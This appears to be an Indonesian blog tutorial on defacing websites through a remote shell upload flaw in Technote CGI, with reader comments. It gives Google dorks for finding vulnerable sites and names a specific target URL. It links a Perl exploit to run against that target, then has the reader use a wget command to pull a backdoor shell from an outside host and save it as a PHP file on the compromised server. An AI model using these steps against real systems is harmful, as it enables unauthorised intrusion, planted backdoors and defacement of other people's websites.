Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Hallo mina disini saya akan share tutorial deface Teknik RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability 

Tidak Usah Basa Basi Langsung Aja Ke TKP..........

Pertama Kita Dorking Dulu Webnya :
Google Dork 1 : inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"  
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan



disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext= 
kita ambil linknya sampe FREE_BOARD SAJA 
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD

Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)




https://pastebin.com/raw/SszbnkBt

Ubah Ekstensi Menjadi pl karena ini codingan perl

gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp  
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3

Langkah Selanjutnya 
Buka Terminalnya 


kalian cukup ketik perintah / copy : 
perl namafile.pl target 

 

Enter Maka Hasilnya Akan Seperti Ini
 

itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya
disini kita akan tanem shell dengan menggunakan direct txt ke php
gimana sih caranya ?

setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut 

 

maka hasilnya akan seperti diatas
setelah itu anda tinggal masuk ke salah satu folder diatas
disini saya akan masuk ke folder board 
dengan ketik perintah cd board

 

maka hasilnya akan seperti ini 
nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt

gimana sih ko txt bisa diubah ke php  ?

dengan ketik perintah diterminal
wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php 


jika berhasil maka hasilnya akan seperti ss di atas 
bang dimana sih letak shell nya :'( ?
kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php


4 Responses to "Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability"

  1. Mantep gan tutornya 😂😂

    ReplyDelete
  2. Csrfnya bos, di remove ya

    ReplyDelete
  3. Anonymous6/16/2019

    susah nih kayanya

    ReplyDelete
  4. knp d remove yeh kgk niat bgt buat tutornya

    ReplyDelete

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel